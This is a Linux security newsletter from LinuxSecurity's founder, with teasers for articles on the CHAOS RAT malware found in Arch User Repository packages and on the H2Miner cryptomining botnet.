Linux admins,

Last year, we started to see an increasing awareness about software supply chain issues in the Linux community. Now we're seeing trust issues with the CHAOS RAT incident in the Arch User Repository (AUR). A threat actor managed to upload remote access trojan packages to the AUR. It took two days for developers to realize it, but what systems were compromised? What's the impact on you?

This incident serves as a critical reminder to always "trust, but verify" when dealing with open-source repositories. Read on to learn more about how you can protect against these types of attacks and what we should do as a community in the future.

Yours in Open Source,

Dv Signature Newsletter 2024 Esm W150

Dave Wreski

LinuxSecurity Founder

CHAOS RAT in AUR: When Trust in Open-Source Goes Too Far

19.Laptop Bed Esm W400

If you’ve spent any time managing Arch Linux systems, you’re probably familiar with the Arch User Repository (AUR). It’s an undeniable powerhouse for software installation, delivering thousands of packages maintained by a vibrant and tech-savvy community. It’s open, flexible, and lets you grab niche tools and utilities with relative ease—but that openness is a double-edged sword. As of July 2025, it’s proven again why “trust, but verify” should be your mantra for community-maintained repositories.

The recent discovery of malicious packages in the AUR is more than just another security hiccup for Linux; it’s a red flag for larger issues in open-source ecosystems. Three packages masquerading as browser tools were found to contain scripts that install a rather nasty piece of malware known as the CHAOS Remote Access Trojan (RAT). These packages weren’t lingering unnoticed for weeks; they were flagged and removed within two days. Yet that’s long enough for this malware to plant roots in systems that relied, perhaps a little too naively, on the AUR's trust model.

Let’s break down what happened, why it matters, and what you can do now to protect your Linux systems.

Learn About CHAOS RAT in AUR>>

Cryptomining Meets AI: H2Miner’s Multi-Platform Assault Unveiled

11.Locks IsometricPattern Esm W400

Let’s face it: threat actors are getting smarter, and malware isn’t just for your typical Windows clickbait anymore. In recent years, the H2Miner botnet has gone from a single-purpose miner to a Swiss Army knife of exploits, targeting Linux systems, Windows machines, and even containers. If you’re managing Linux environments or containerized workloads, this is the kind of threat that'll keep you up at night—not because it’s flashy, but because it’s sneaky, persistent, and laser-focused on chewing up your infrastructure to mine Monero.

Here’s the kicker: it’s not just about cryptomining anymore. Recent analyses suggest H2Miner’s operators are toying with ransomware (we’ll get into that) and even bringing AI into the mix. Yep, Artificial Intelligence is no longer just for automation or fancy predictive analytics—it’s now a tool for speeding up malware creation. This isn’t just some isolated threat clunking around on outdated servers; it’s an adaptive, constantly evolving botnet that’s now playing across multiple domains. If you’re running Linux boxes or container workloads, it’s time to double down on security. 

Let's take a look at this growing threat, how it is advancing, and what you can do to fight back.

Learn About H2Miner>>